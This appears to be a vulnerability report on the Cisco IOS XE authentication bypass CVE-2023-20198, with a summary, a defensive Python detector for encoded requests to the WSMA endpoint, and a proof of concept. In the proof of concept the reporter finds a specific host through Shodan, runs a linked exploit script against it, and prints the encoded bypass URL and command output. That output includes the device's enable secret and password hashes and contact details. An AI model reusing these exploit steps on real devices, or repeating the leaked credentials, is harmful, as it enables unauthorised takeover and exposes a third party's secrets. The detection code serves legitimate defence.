## Summary:
CVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the webui_wsma_http web endpoint without requiring authentication. By bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS root user to facilitate implantation.
This PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:
The vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.
The add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but that's outside the scope of this PoC.
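As an added example that is not part of the original report or the linked PoC, the following Python flags access-log requests whose path, after repeated percent-decoding and case-folding, resolves to the `webui_wsma_http` endpoint while the raw path disguised it with encoding or mixed case. That is the bypass described above, seen from the defender's side. The log lines and IPs are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (hypothetical hosts, not the report's target).
SAMPLE_LOG = """\
10.0.0.5 - - [16/Oct/2023:10:01:02 +0000] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 200 512
10.0.0.6 - - [16/Oct/2023:10:01:05 +0000] "GET /webui/ HTTP/1.1" 200 1024
10.0.0.7 - - [16/Oct/2023:10:02:11 +0000] "POST /%77ebui_wsma_HTTP HTTP/1.1" 200 300
10.0.0.8 - - [16/Oct/2023:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

ENDPOINT = "webui_wsma_http"
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def normalize_path(path, max_rounds=3):
    """Percent-decode until the path stops changing (catches double encoding),
    then case-fold so 'Http' and 'HTTP' compare equal to 'http'."""
    prev = path
    for _ in range(max_rounds):
        cur = unquote(prev)
        if cur == prev:
            break
        prev = cur
    return prev.lower()


def classify_path(path):
    """Return (decoded_path, hits_endpoint, used_evasion).
    used_evasion is True when the raw path only reaches the endpoint after
    decoding or case-folding, i.e. the filter-bypass pattern."""
    decoded = normalize_path(path)
    hits = ENDPOINT in decoded
    evasion = hits and (ENDPOINT not in path)
    return decoded, hits, evasion


def find_suspicious(log_text):
    """Scan access-log text and return one finding per request that reaches
    the WSMA endpoint, recording whether encoding/case evasion was used."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        decoded, hits, evasion = classify_path(m.group("path"))
        if hits:
            findings.append({"ip": m.group("ip"), "raw": m.group("path"),
                             "decoded": decoded, "evasion": evasion})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f['ip']} {f['raw']} -> {f['decoded']} evasion={f['evasion']}")
```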
## Proof of Concept:
See below for an example request that bypasses authentication on vulnerable instances of IOS-XE. This POC creates a user named baduser with privilege level 15. Let’s dig into the details.
{F3672631}
1. Sign in to Shodan as any user.
1. Go to the search bar and run the query `org: "MTN Innovation Centre"`.
1. Found a host owned by MTN Cameroon at `41.208.24.174`.
1. Intercept the URL in Burp Suite and send it to Repeater.
1. Send it to Intruder and set up the [exploit from here](https://gist.github.com/functionofpwnosec/aa4ef339aafab346eecbf78522055c31).
1. Run the exploit with the commands below:
```bash
exploit.py -t 41.208.24.174 -c
Testing for vulnerability
Target IP: 41.208.24.174
Target URL: http://41.208.24.174/%2577eb%2575i_%2577sma_Http
Vulnerable: True
IOS Ver: ISR4331/K9 europ-constantia-2 IOS 16.6 Cisco IOS Software [Everest], ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.6.4, RELEASE SOFTWARE (fc3)
Done.
```
```bash
exploit.py -t 41.208.24.174 -g
Selected Target: 41.208.24.174
Running in Exec Mode
Executing Command: sh run
Sending exploit to target URL: http://41.208.24.174/%2577eb%2575i_%2577sma_Http
Building configuration...
Current configuration : 17326 bytes
```
```bash
enable secret 5 $1$vF3Q$wplcifyib3DUyzbgcUGe/1
enable password 7 1214041E1E
snmp-server trap-source GigabitEthernet0/0/0.3029
snmp-server source-interface informs GigabitEthernet0/0/0.3029
snmp-server contact
[email protected] 0860110860
```
As you can see, the full running configuration, including sensitive values, was exposed.
{F3672637}
{F3672640}
{F3672642}
## Supporting Material/References:
* [Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)
* [horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)
* [horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)
* [LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)
## Impact
Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system.